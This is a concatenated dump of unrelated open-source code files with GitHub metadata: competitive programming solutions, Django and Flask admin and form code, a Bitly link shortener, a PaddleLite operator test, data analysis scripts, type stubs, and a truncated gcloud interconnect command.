for j in range(h-1):
if (i >> j) & 1:
pos[j+1] = pos[j]+1
else:
pos[j+1] = pos[j]
cmii = pos[-1]
si = [0]*h
for jj in range(h):
si[pos[jj]] += s[jj][0]
if max(si) > k:
continue
f = True
for j in range(1,w):
if f:
for ii in range(h):
if si[pos[ii]]+s[ii][j] > k:
cmii += 1
si = [0]*h
for jj in range(h):
si[pos[jj]] += s[jj][j]
if max(si) > k:
f = False
break
else:
si[pos[ii]]+=s[ii][j]
if f and cmii < cmi:
cmi = cmii
print(cmi)
return
if __name__ == '__main__':
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
85a6f0dce317685ae612e2bca918b99ee3ef6b1d
|
3a4549470cb0e6e55c98522ba08ce629d60960ea
|
/froide/team/admin.py
|
bd9346dc479e03302643ee0b3e01d265517a39e5
|
[
"MIT"
] |
permissive
|
lanmarc77/froide
|
4e28d3e33017b3e776a7eb13d63c7b71bdb3bc68
|
bddc8bb27c8a7c2a959003dda724194948bc381a
|
refs/heads/main
| 2023-03-17T03:02:01.277465
| 2021-03-06T16:37:26
| 2021-03-06T16:37:26
| 345,137,125
| 0
| 0
|
MIT
| 2021-03-06T16:13:09
| 2021-03-06T16:13:09
| null |
UTF-8
|
Python
| false
| false
| 359
|
py
|
from django.contrib import admin
from .models import Team, TeamMembership
class TeamMembershipInline(admin.StackedInline):
model = TeamMembership
raw_id_fields = ('user', 'team',)
class TeamAdmin(admin.ModelAdmin):
list_display = ('name', 'created', 'member_count')
inlines = [TeamMembershipInline]
admin.site.register(Team, TeamAdmin)
|
[
"mail@stefanwehrmeyer.com"
] |
mail@stefanwehrmeyer.com
|
4450c9e63147eef26ddad97af09b212090a7a78f
|
46224332185d4d0a1a56ba12ca0fad68e0090693
|
/main.py
|
ea6fe8fcf3a2f2104be8faa4f8b4442114aad9ed
|
[] |
no_license
|
n1k0din/bitly
|
131ccc2d56e60b994a7eb04a1809744c27f7092c
|
a6a4735105e09fcc7134783ad2748239f2e92127
|
refs/heads/main
| 2023-04-03T11:27:25.676797
| 2021-04-14T00:03:27
| 2021-04-14T00:03:27
| 356,873,736
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,554
|
py
|
import argparse
import os
from urllib.parse import urlparse
import requests
from dotenv import load_dotenv
BITLY_API_URL = 'https://api-ssl.bitly.com/v4'
def create_argument_parser():
parser = argparse.ArgumentParser(description='Сокращает ссылку или выдает \
количество кликов по битлинку')
parser.add_argument('url', help='URL для обработки')
return parser
def create_auth_headers(token):
return {'Authorization': f'Bearer {token}'}
def remove_scheme_from_url(url):
parsed = urlparse(url)
return parsed._replace(scheme='').geturl()
def is_bitlink(token, url):
headers = create_auth_headers(token)
stripped_url = remove_scheme_from_url(url)
bitlink_info_method = f'/bitlinks/{stripped_url}'
bitlink_info_url = f'{BITLY_API_URL}{bitlink_info_method}'
response = requests.get(bitlink_info_url, headers=headers)
return response.ok
def shorten_link(token, url):
headers = create_auth_headers(token)
shorten_method = '/shorten'
shorten_url = f'{BITLY_API_URL}{shorten_method}'
payload = {'long_url': url}
response = requests.post(shorten_url, headers=headers, json=payload)
response.raise_for_status()
return response.json()['link']
def count_clicks(token, bitlink):
headers = create_auth_headers(token)
stripped_url = remove_scheme_from_url(bitlink)
count_clicks_method = f'/bitlinks/{stripped_url}/clicks/summary'
count_clicks_url = f'{BITLY_API_URL}{count_clicks_method}'
params = {'units': -1}
response = requests.get(count_clicks_url, headers=headers, params=params)
response.raise_for_status()
return response.json()['total_clicks']
def process_url(token, url):
if is_bitlink(token, url):
try:
clicks_amount = count_clicks(token, url)
except requests.exceptions.HTTPError:
return 'Кажется, нет такой ссылки'
return f'Количество кликов: {clicks_amount}'
try:
bitlink = shorten_link(token, url)
except requests.exceptions.HTTPError as e:
return f'{e}\nНе удалось получить сокращенную ссылку, проверьте ввод'
return f'{bitlink}'
def main():
load_dotenv()
bitly_token = os.getenv('BITLY_TOKEN')
arg_parser = create_argument_parser()
user_link = arg_parser.parse_args().url
print(process_url(bitly_token, user_link))
if __name__ == '__main__':
main()
|
[
"nik726@gmail.com"
] |
nik726@gmail.com
|
7ff446abab86764c91765bd0cb1939d5c7d97daa
|
6da0ded69dde46394dc00f6cebd2541938920dff
|
/lite/tests/unittest_py/op/test_reduce_mean_op.py
|
17349af14ca5bb7ec03c6ee39edb95d7a67eb33e
|
[
"Apache-2.0"
] |
permissive
|
ishine/paddle-mobile
|
e346f1fb537485d60c6e8f7eb5cba102de0fe6c2
|
42dbfe288dc49625649dc9499258d2bcf79c9dcd
|
refs/heads/develop
| 2023-05-30T10:17:52.866644
| 2023-05-16T11:40:33
| 2023-05-16T11:40:33
| 201,366,144
| 0
| 0
|
Apache-2.0
| 2020-01-14T07:23:03
| 2019-08-09T01:35:22
|
C++
|
UTF-8
|
Python
| false
| false
| 4,949
|
py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('../')
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
import hypothesis.strategies as st
from functools import partial
import numpy as np
import argparse
class TestReduceMeanOp(AutoScanTest):
def __init__(self, *args, **kwargs):
AutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(TargetType.X86, PrecisionType.FP32,
DataLayoutType.NCHW)
self.enable_testing_on_place(
TargetType.ARM,
PrecisionType.FP32,
DataLayoutType.NCHW,
thread=[1, 4])
opencl_places = [
Place(TargetType.OpenCL, PrecisionType.FP16,
DataLayoutType.ImageDefault), Place(
TargetType.OpenCL, PrecisionType.FP16,
DataLayoutType.ImageFolder),
Place(TargetType.OpenCL, PrecisionType.FP32, DataLayoutType.NCHW),
Place(TargetType.OpenCL, PrecisionType.Any,
DataLayoutType.ImageDefault), Place(
TargetType.OpenCL, PrecisionType.Any,
DataLayoutType.ImageFolder),
Place(TargetType.OpenCL, PrecisionType.Any, DataLayoutType.NCHW),
Place(TargetType.Host, PrecisionType.FP32)
]
self.enable_testing_on_place(places=opencl_places)
self.enable_testing_on_place(TargetType.NNAdapter, PrecisionType.FP32)
self.enable_devices_on_nnadapter(device_names=[
"cambricon_mlu", "intel_openvino", "kunlunxin_xtcl"
])
def is_program_valid(self,
program_config: ProgramConfig,
predictor_config: CxxConfig) -> bool:
return True
def sample_program_configs(self, draw):
in_shape = draw(
st.lists(
st.integers(
min_value=1, max_value=10), min_size=4, max_size=4))
keep_dim = draw(st.booleans())
axis_list = draw(
st.sampled_from([[0], [1], [2], [3], [0, 1], [1, 2], [2, 3]]))
reduce_all_data = True if axis_list == None or axis_list == [] else False
def generate_input(*args, **kwargs):
return np.random.random(in_shape).astype(np.float32)
build_ops = OpConfig(
type="reduce_mean",
inputs={"X": ["input_data"], },
outputs={"Out": ["output_data"], },
attrs={
"dim": axis_list,
"keep_dim": keep_dim,
"reduce_all": reduce_all_data,
})
program_config = ProgramConfig(
ops=[build_ops],
weights={},
inputs={
"input_data": TensorConfig(data_gen=partial(generate_input)),
},
outputs=["output_data"])
return program_config
def sample_predictor_configs(self):
return self.get_predictor_configs(), ["reduce_mean"], (1e-2, 1e-2)
def add_ignore_pass_case(self):
def _teller1(program_config, predictor_config):
target_type = predictor_config.target()
in_shape = list(program_config.inputs["input_data"].shape)
axis = program_config.ops[0].attrs["dim"]
if target_type == TargetType.OpenCL:
if len(axis) == 1 and len(in_shape) == 4:
return True
self.add_ignore_check_case(
_teller1, IgnoreReasons.ACCURACY_ERROR,
"The op output has diff in a specific case on opencl. We need to fix it as soon as possible."
)
def _teller3(program_config, predictor_config):
target_type = predictor_config.target()
if target_type == TargetType.OpenCL:
return True
self.add_ignore_check_case(_teller3,
IgnoreReasons.PADDLELITE_NOT_SUPPORT,
"Expected kernel_type false.")
def test(self, *args, **kwargs):
self.run_and_statis(quant=False, max_examples=100)
if __name__ == "__main__":
unittest.main(argv=[''])
|
[
"noreply@github.com"
] |
ishine.noreply@github.com
|
da715d70607b45a4b6225f162482dd1ef2943ae5
|
1af49694004c6fbc31deada5618dae37255ce978
|
/chrome/browser/chromeos/exo/DEPS
|
1ff90b7330527bd26d73215c1179e91ca9fc6fb5
|
[
"BSD-3-Clause"
] |
permissive
|
sadrulhc/chromium
|
59682b173a00269ed036eee5ebfa317ba3a770cc
|
a4b950c23db47a0fdd63549cccf9ac8acd8e2c41
|
refs/heads/master
| 2023-02-02T07:59:20.295144
| 2020-12-01T21:32:32
| 2020-12-01T21:32:32
| 317,678,056
| 3
| 0
|
BSD-3-Clause
| 2020-12-01T21:56:26
| 2020-12-01T21:56:25
| null |
UTF-8
|
Python
| false
| false
| 166
|
specific_include_rules = {
"chrome_file_helper\.cc": [
"+ash/wm/window_util.h",
],
"chrome_file_helper_unittest\.cc": [
"+ash/wm/window_util.h",
],
}
|
[
"commit-bot@chromium.org"
] |
commit-bot@chromium.org
|
|
0606e6062f3381696f7a7d9c201d4a0bb6283488
|
6b1e89d486515d40722cf780a2925c7269f68c5f
|
/05Month/pandas/extra/stock.py
|
d16f6b661d65d232a678f127998c4a1869ee33c5
|
[] |
no_license
|
LiuJingGitLJ/PythonAnalysis
|
c2c7d96a1dde81a911a828a9dcb4e3fc868ca83e
|
ddee4a026b3313aa43583311a1b73b22d5f13678
|
refs/heads/master
| 2020-03-14T22:58:48.329637
| 2018-05-02T12:22:30
| 2018-05-02T12:22:30
| 131,833,542
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,988
|
py
|
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
names = ['date',
'time',
'opening_price',
'ceiling_price',
'floor_price',
'closing_price',
'volume',
'amount']
raw = pd.read_csv('SH600690.csv', names = names, header = None, index_col='date', parse_dates=True)
print raw.head()
print
'''
# 根据涨跌幅判断数据是否有效
def _valid_price(prices):
return (((prices.max() - prices.min()) / prices.min()) < 0.223).all()
# 按日期分组
days = raw.groupby(level = 0).agg(
{'opening_price':lambda prices: _valid_price(prices) and prices[0] or 0,
'ceiling_price':lambda prices: _valid_price(prices) and np.max(prices) or 0,
'floor_price':lambda prices: _valid_price(prices) and np.min(prices) or 0,
'closing_price':lambda prices: _valid_price(prices) and prices[-1] or 0,
'volume':'sum',
'amount':'sum'})
print days.head()
print
# 缺少数据处理,因为周末没有交易。
start = days.iloc[0:1].index.tolist()[0]
end = days.iloc[-2:-1].index.tolist()[0]
new_idx = pd.date_range(start = start, end = end)
print new_idx
data = days.reindex(new_idx) # 重新索引
zero_values = data.loc[~(data.volume > 0)].loc[:, ['volume', 'amount']]
data.update(zero_values.fillna(0)) # 交易量和金额填0
data.fillna(method = 'ffill', inplace = True) # 价格用前一天的填充
print data.head()
print
# 计算30各自然日里的股票平均波动周率
def gen_item_group_index(total, group_len):
group_count = total / group_len
group_index = np.arange(total)
for i in xrange(group_count):
group_index[i * group_len: (i+ 1) * group_len] = i
group_index[(i + 1) * group_len:] = i +1
return group_index.tolist()
period = 30
group_index = gen_item_group_index(len(data), period)
data['group_index'] = group_index
print data.head().append(data.tail())
# 为负表示先出现最高价再出现最低价,即下跌波动。
def _ceiling_price(prices):
return prices.idxmin() < prices.idxmax() and np.max(prices) or (-np.max(prices))
group = data.groupby('group_index').agg(
{'volume': 'sum',
'floor_price': 'min',
'ceiling_price': _ceiling_price})
print group.head()
date_col = pd.DataFrame({'group_index': group_index, 'date': new_idx})
print date_col
group['date'] = date_col.groupby('group_index').agg('first') # 为每个索引添加开始日期
print group.head()
group['ripples_ratio'] = group.ceiling_price / group.floor_price # 计算并添加波动率
print group.head()
print
# 波动率排序
ripples = group.sort_values('ripples_ratio', ascending = False)
print ripples
print ripples.head(10).ripples_ratio.mean()
print ripples.tail(10).ripples_ratio.mean()
print
# 计算涨跌幅
rise = data.closing_price.diff()
data['rise'] = rise
print data.head()
'''
|
[
"15201078137@163.com"
] |
15201078137@163.com
|
4cd21e735decb89c8f8517e5a9d9ad37539c3fcb
|
c33afad644823bff35e616de90713ba0db50c152
|
/xia2-attic/Applications/get_ccp4_commands.py
|
efef79c10fdb753c96a78144c97a0ca908db641a
|
[] |
no_license
|
xia2/trashcan
|
fe58cc189cb167be6fdda131b8af04b6a126f114
|
05b2423823297b89e7dc1c5fb68285d1bfc8d48f
|
refs/heads/master
| 2021-01-01T19:02:19.523868
| 2015-07-21T11:41:19
| 2015-07-21T11:41:19
| 39,441,400
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 944
|
py
|
#!/usr/bin/env python
import sys
def get_ccp4_commands(lines_of_input):
'''Get the commands which were sent to a CCP4 program.'''
# first look through for hklin / hklout
logicals = { }
for line in lines_of_input:
if 'Logical Name:' in line:
token = line.split(':')[1].split()[0]
value = line.split(':')[-1].strip()
logicals[token] = value
# then look for standard input commands
script = []
for line in lines_of_input:
if 'Data line---' in line:
script.append(line.replace('Data line---', '').strip())
return script, logicals
if __name__ == '__main__':
if len(sys.argv) != 2:
raise RuntimeError, '%s ccp4_program.log' % sys.argv[0]
script, logicals = get_ccp4_commands(open(sys.argv[1], 'r').readlines())
for token in logicals.keys():
print token, logicals[token]
for line in script:
print line
|
[
"graeme.winter@gmail.com"
] |
graeme.winter@gmail.com
|
f9d1b1d94284348c99187c29166134746d461bcc
|
960ca4512880cdfdc6daccde8d9271b611824ddb
|
/exps/vis/test.py
|
17ccb9517f47b95b538e761d0c39a60b2036f54b
|
[
"MIT"
] |
permissive
|
xiaoye77/NAS-Projects
|
f0b66207814fd1ee9e656678230eed5a491d7deb
|
db44e56fb6b756e03b3d04228fccb6b0fd1060c2
|
refs/heads/master
| 2020-12-04T03:53:36.442866
| 2020-01-02T05:49:16
| 2020-01-02T05:49:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,118
|
py
|
# python ./exps/vis/test.py
import os, sys, random
from pathlib import Path
import torch
import numpy as np
from collections import OrderedDict
lib_dir = (Path(__file__).parent / '..' / '..' / 'lib').resolve()
if str(lib_dir) not in sys.path: sys.path.insert(0, str(lib_dir))
from graphviz import Digraph
def test_nas_api():
from nas_102_api import ArchResults
xdata = torch.load('/home/dxy/FOR-RELEASE/NAS-Projects/output/NAS-BENCH-102-4/simplifies/architectures/000157-FULL.pth')
for key in ['full', 'less']:
print ('\n------------------------- {:} -------------------------'.format(key))
archRes = ArchResults.create_from_state_dict(xdata[key])
print(archRes)
print(archRes.arch_idx_str())
print(archRes.get_dataset_names())
print(archRes.get_comput_costs('cifar10-valid'))
# get the metrics
print(archRes.get_metrics('cifar10-valid', 'x-valid', None, False))
print(archRes.get_metrics('cifar10-valid', 'x-valid', None, True))
print(archRes.query('cifar10-valid', 777))
OPS = ['skip-connect', 'conv-1x1', 'conv-3x3', 'pool-3x3']
COLORS = ['chartreuse' , 'cyan' , 'navyblue', 'chocolate1']
def plot(filename):
g = Digraph(
format='png',
edge_attr=dict(fontsize='20', fontname="times"),
node_attr=dict(style='filled', shape='rect', align='center', fontsize='20', height='0.5', width='0.5', penwidth='2', fontname="times"),
engine='dot')
g.body.extend(['rankdir=LR'])
steps = 5
for i in range(0, steps):
if i == 0:
g.node(str(i), fillcolor='darkseagreen2')
elif i+1 == steps:
g.node(str(i), fillcolor='palegoldenrod')
else: g.node(str(i), fillcolor='lightblue')
for i in range(1, steps):
for xin in range(i):
op_i = random.randint(0, len(OPS)-1)
#g.edge(str(xin), str(i), label=OPS[op_i], fillcolor=COLORS[op_i])
g.edge(str(xin), str(i), label=OPS[op_i], color=COLORS[op_i], fillcolor=COLORS[op_i])
#import pdb; pdb.set_trace()
g.render(filename, cleanup=True, view=False)
if __name__ == '__main__':
test_nas_api()
for i in range(200): plot('{:04d}'.format(i))
|
[
"280835372@qq.com"
] |
280835372@qq.com
|
e1f0e5d00a2ac00fd29fe1510687dbba7b48f35e
|
4a8c1f7d9935609b780aff95c886ef7781967be0
|
/atcoder/ABC/D/154_d.py
|
43055970fa71c8d1fc0e279b10cfca40369c0986
|
[] |
no_license
|
recuraki/PythonJunkTest
|
d5e5f5957ac5dd0c539ef47759b1fe5ef7a2c52a
|
2556c973d468a6988d307ce85c5f2f8ab15e759a
|
refs/heads/master
| 2023-08-09T17:42:21.875768
| 2023-07-18T23:06:31
| 2023-07-18T23:06:31
| 13,790,016
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,613
|
py
|
import sys
from io import StringIO
import unittest
import logging
logging.basicConfig(level=logging.DEBUG)
def resolve():
n, k = map(int, input().split())
dat = list(map(int, input().split()))
dat2 = []
m = -1
#print(dat[:k])
n = sum(dat[:k])
dat2.append(n)
m = n
mind = 0
for i in range(1, len(dat) - k ):
#print("in/out")
#print(dat[k+i])
#print(dat[i])
n += dat[k+i]
n -= dat[i]
dat2.append(n)
if n > m:
m = n
mind = i + 1
#print(dat2)
#print(m)
#print(mind)
r = 0
for i in range(mind, mind + k):
r += (dat[i] + 1) / 2
print(r)
class TestClass(unittest.TestCase):
def assertIO(self, input, output):
stdout, stdin = sys.stdout, sys.stdin
sys.stdout, sys.stdin = StringIO(), StringIO(input)
resolve()
sys.stdout.seek(0)
out = sys.stdout.read()[:-1]
sys.stdout, sys.stdin = stdout, stdin
self.assertEqual(out, output)
def test_input_1(self):
print("test_input_1")
input = """5 3
1 2 2 4 5"""
output = """7.000000000000"""
self.assertIO(input, output)
def test_input_2(self):
print("test_input_2")
input = """4 1
6 6 6 6"""
output = """3.500000000000"""
self.assertIO(input, output)
def test_input_3(self):
print("test_input_3")
input = """10 4
17 13 13 12 15 20 10 13 17 11"""
output = """32.000000000000"""
self.assertIO(input, output)
if __name__ == "__main__":
unittest.main()
|
[
"glenda.kanai@gmail.com"
] |
glenda.kanai@gmail.com
|
678bbf0f3acbb639e8f26ad0eda2be449d96f08b
|
29e4d393351c87741f069092eb8d0ab6f1221d6f
|
/venv/lib/python3.6/site-packages/Crypto/Cipher/_mode_openpgp.pyi
|
14b810588d15c2c693b6b6580803aee05847cfe4
|
[
"MIT"
] |
permissive
|
masora1030/eigoyurusan
|
f0eb7d9761aa150379b558c13fc2477daf504417
|
fa82044a2dc2f0f1f7454f5394e6d68fa923c289
|
refs/heads/master
| 2022-12-01T09:31:17.330620
| 2020-07-22T14:51:59
| 2020-07-22T14:51:59
| 279,682,018
| 11
| 2
|
MIT
| 2020-07-22T22:02:57
| 2020-07-14T20:03:45
|
Python
|
UTF-8
|
Python
| false
| false
| 556
|
pyi
|
from types import ModuleType
from typing import Union, Dict
Buffer = Union[bytes, bytearray, memoryview]
__all__ = ['OpenPgpMode']
class OpenPgpMode(object):
block_size: int
iv: Union[bytes, bytearray, memoryview]
IV: Union[bytes, bytearray, memoryview]
def __init__(self,
factory: ModuleType,
key: Buffer,
iv: Buffer,
cipher_params: Dict) -> None: ...
def encrypt(self, plaintext: Buffer) -> bytes: ...
def decrypt(self, plaintext: Buffer) -> bytes: ...
|
[
"soraemonpockt@icloud.com"
] |
soraemonpockt@icloud.com
|
8ab7dff45d69393de7c70aedebe150563e1b17ff
|
7942342d457276bb266228d0236af647b3d55477
|
/django/contrib/sites/managers.pyi
|
465f1dc86cf24c0cc822bb976a68d2719d74eb2b
|
[
"MIT"
] |
permissive
|
AsymmetricVentures/mypy-django
|
847c4e521ce4dec9a10a1574f9c32b234dafd00b
|
f6e489f5cf5672ecede323132665ccc6306f50b8
|
refs/heads/master
| 2020-06-30T01:53:44.434394
| 2016-12-22T22:45:50
| 2016-12-22T22:45:50
| 74,397,884
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 417
|
pyi
|
# Stubs for django.contrib.sites.managers (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from typing import Any, Optional
from django.db import models
class CurrentSiteManager(models.Manager):
use_in_migrations = ... # type: bool
def __init__(self, field_name: Optional[Any] = ...) -> None: ...
def check(self, **kwargs): ...
def get_queryset(self): ...
|
[
"reames@asymmetricventures.com"
] |
reames@asymmetricventures.com
|
1220ca9448bfb849dd34483c850bc5f2d5ba6069
|
0f3411225b51d13fd418814c02d153493b06c1b9
|
/app/admin/forms.py
|
4202c752dcb6839eed82ea82954fec18498e84fd
|
[] |
no_license
|
ChenxiiCheng/flask-movie
|
9220decb79171281aa1348bd482f24fe1f2a3097
|
623ce5ba6c6379bed6b71adf321680e9cb5e6df3
|
refs/heads/master
| 2020-04-30T03:44:26.172855
| 2019-03-19T20:37:57
| 2019-03-19T20:37:57
| 176,594,138
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,029
|
py
|
# coding:utf8
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, FileField, TextAreaField, SelectField, SelectMultipleField
from wtforms.validators import DataRequired, ValidationError, EqualTo
from app.models import Admin, Tag, Auth, Role
tags = Tag.query.all()
auth_list = Auth.query.all()
role_list = Role.query.all()
class LoginForm(FlaskForm):
"管理员登录表单"
account = StringField(
label="账号",
validators=[
DataRequired("请输入账号")
],
description="账号",
render_kw={
"class": "form-control",
"placeholder": "请输入账号!",
# "required": "required"
},
)
pwd = PasswordField(
label="密码",
validators=[
DataRequired("请输入密码")
],
description="密码",
render_kw={
"class": "form-control",
"placeholder": "请输入密码",
# "required": "required"
},
)
submit = SubmitField(
label="登录",
render_kw={
"class": "btn btn-primary btn-block btn-flat",
}
)
def validate_account(self, field):
account = field.data
admin = Admin.query.filter_by(name=account).count()
if admin == 0:
raise ValidationError("账号不存在!")
class TagForm(FlaskForm):
name = StringField(
label="名称",
validators=[
DataRequired("请输入标签")
],
description="标签",
render_kw={
"class": "form-control",
"id": 'input_name',
"placeholder": "请输入标签名称!"
},
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
class MovieForm(FlaskForm):
title = StringField(
label="片名",
validators=[
DataRequired("请输入片名!")
],
description="片名",
render_kw={
"class": "form-control",
"placeholder": "请输入片名!"
},
)
url = FileField(
label="文件",
validators=[
DataRequired("请上传文件!")
],
description="文件",
)
info = TextAreaField(
label="简介",
validators=[
DataRequired("请输入简介!")
],
description="简介",
render_kw={
"class": "form-control",
"row": 10
},
)
logo = FileField(
label="封面",
validators=[
DataRequired("请上传封面!")
],
description="封面",
)
star = SelectField(
label="星级",
validators=[
DataRequired("请选择星级!")
],
# star的数据类型
coerce=int,
choices=[(1, "1星"), (2, "2星"), (3, "3星"), (4, "4星"), (5, "5星")],
description="星级",
render_kw={
"class": "form-control",
}
)
tag_id = SelectField(
label="标签",
validators=[
DataRequired("请选择标签!")
],
coerce=int,
choices=[(v.id, v.name) for v in tags],
description="标签",
render_kw={
"class": "form-control",
},
)
area = StringField(
label="地区",
validators=[
DataRequired("请输入地区!")
],
description="地区",
render_kw={
"class": "form-control",
"placeholder": "请输入地区!"
},
)
length = StringField(
label="片长",
validators=[
DataRequired("请输入片长!")
],
description="片长",
render_kw={
"class": "form-control",
"placeholder": "请输入片长!"
},
)
release_time = StringField(
label="上映时间",
validators=[
DataRequired("请选择上映时间!")
],
description="上映时间",
render_kw={
"class": "form-control",
"placeholder": "请选择上映时间!",
"id": "input_release_time"
},
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
class PreviewForm(FlaskForm):
title = StringField(
label="预告标题",
validators=[
DataRequired("请输入预告标题!")
],
description="预告标题",
render_kw={
"class": "form-control",
"placeholder": "请输入预告标题!"
},
)
logo = FileField(
label="预告封面",
validators=[
DataRequired("请上传预告封面!")
],
description="预告封面",
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
class PwdForm(FlaskForm):
old_pwd = PasswordField(
label="旧密码",
validators=[
DataRequired("请输入旧密码!")
],
description="旧密码",
render_kw={
"class": "form-control",
"palceholder": "请输入旧密码!",
}
)
new_pwd = PasswordField(
label="新密码",
validators=[
DataRequired("请输入新密码!")
],
description="新密码",
render_kw={
"class": "form-control",
"palceholder": "请输入新密码!",
}
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
def validate_old_pwd(self, field):
from flask import session
pwd = field.data
name = session["admin"]
admin = Admin.query.filter_by(
name=name
).first()
if not admin.check_pwd(pwd):
raise ValidationError("旧密码错误!")
class AuthForm(FlaskForm):
name = StringField(
label="权限名称",
validators=[
DataRequired("请输入权限名称!")
],
description="权限名称",
render_kw={
"class": "form-control",
"placeholder": "请输入权限名称!"
},
)
url = StringField(
label="权限地址",
validators=[
DataRequired("请输入权限地址!")
],
description="权限地址",
render_kw={
"class": "form-control",
"placeholder": "请输入权限地址!"
},
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
class RoleForm(FlaskForm):
name = StringField(
label="角色名称",
validators=[
DataRequired("请输入角色名称!")
],
description="角色名称",
render_kw={
"class": "form-control",
"placeholder": "请输入角色名称!"
},
)
auths = SelectMultipleField(
label="权限列表",
validators=[
DataRequired("请选择权限列表!")
],
coerce=int,
choices=[(v.id, v.name) for v in auth_list],
description="权限列表",
render_kw={
"class": "form-control",
}
)
submit = SubmitField(
"编辑",
render_kw={
"class": "btn btn-primary",
}
)
class AdminForm(FlaskForm):
name = StringField(
label="管理员名称",
validators=[
DataRequired("请输入管理员名称!")
],
description="管理员名称",
render_kw={
"class": "form-control",
"placeholder": "请输入管理员名称!",
},
)
pwd = PasswordField(
label="管理员密码",
validators=[
DataRequired("请输入管理员密码!")
],
description="管理员密码",
render_kw={
"class": "form-control",
"placeholder": "请输入管理员密码!",
},
)
repwd = PasswordField(
label="管理员重复密码",
validators=[
DataRequired("请输入管理员重复密码"),
EqualTo('pwd', message="两次密码不一致!")
],
description="管理员重复密码",
render_kw={
"class": "form-control",
"placeholder": "请输入管理员重复密码",
},
)
role_id = SelectField(
label="所属角色",
coerce=int,
choices=[(v.id, v.name) for v in role_list],
render_kw={
"class": "form-control",
}
)
submit = SubmitField(
label="编辑",
render_kw={
"class": "btn btn-primary",
}
)
|
[
"chenxic1011@gmail.com"
] |
chenxic1011@gmail.com
|
01dd184374b0b82db5104e26148e92a0b14e6031
|
d83fde3c891f44014f5339572dc72ebf62c38663
|
/_bin/google-cloud-sdk/lib/surface/compute/interconnects/attachments/create.py
|
36182101c61039ba02985a4cafd3b3b5d13f0b6c
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
gyaresu/dotfiles
|
047cc3ca70f4b405ba272856c69ee491a79d2ebe
|
e5e533b3a081b42e9492b228f308f6833b670cfe
|
refs/heads/master
| 2022-11-24T01:12:49.435037
| 2022-11-01T16:58:13
| 2022-11-01T16:58:13
| 17,139,657
| 1
| 1
| null | 2020-07-25T14:11:43
| 2014-02-24T14:59:59
|
Python
|
UTF-8
|
Python
| false
| false
| 3,990
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command for creating interconnects."""
from __future__ import absolute_import
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute.interconnects.attachments import client
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import parser_errors
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute.interconnects import flags as interconnect_flags
from googlecloudsdk.command_lib.compute.interconnects.attachments import flags as attachment_flags
from googlecloudsdk.command_lib.compute.routers import flags as router_flags
_DEPRECATION_WARNING = """\
`create` is deprecated. Please use `gcloud compute interconnects attachments dedicated create` instead.
"""
_DEPRECATION_ERROR = """\
`create` has been removed. Please use `gcloud compute interconnects attachments dedicated create` instead.
"""
# TODO(b/79153388): Clean up this command flag after 3 months of deprecation.
@base.Deprecate(
is_removed=False, warning=_DEPRECATION_WARNING, error=_DEPRECATION_ERROR)
class Create(base.CreateCommand):
"""Create a Google Compute Engine interconnect attachment.
*{command}* is used to create interconnect attachments. An interconnect
attachment is what binds the underlying connectivity of an Interconnect to a
path into and out of the customer's cloud network.
"""
INTERCONNECT_ATTACHMENT_ARG = None
INTERCONNECT_ARG = None
ROUTER_ARG = None
@classmethod
def Args(cls, parser):
cls.INTERCONNECT_ARG = (
interconnect_flags.InterconnectArgumentForOtherResource(
'The interconnect for the interconnect attachment'))
cls.INTERCONNECT_ARG.AddArgument(parser)
cls.ROUTER_ARG = router_flags.RouterArgumentForOtherResources()
cls.ROUTER_ARG.AddArgument(parser)
cls.INTERCONNECT_ATTACHMENT_ARG = (
attachment_flags.InterconnectAttachmentArgument())
cls.INTERCONNECT_ATTACHMENT_ARG.AddArgument(parser, operation_type='create')
parser.add_argument(
'--description',
help='An optional, textual description for the '
'interconnect attachment.')
parser.display_info.AddCacheUpdater(
interconnect_flags.InterconnectsCompleter)
def Run(self, args):
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
attachment_ref = self.INTERCONNECT_ATTACHMENT_ARG.ResolveAsResource(
args,
holder.resources,
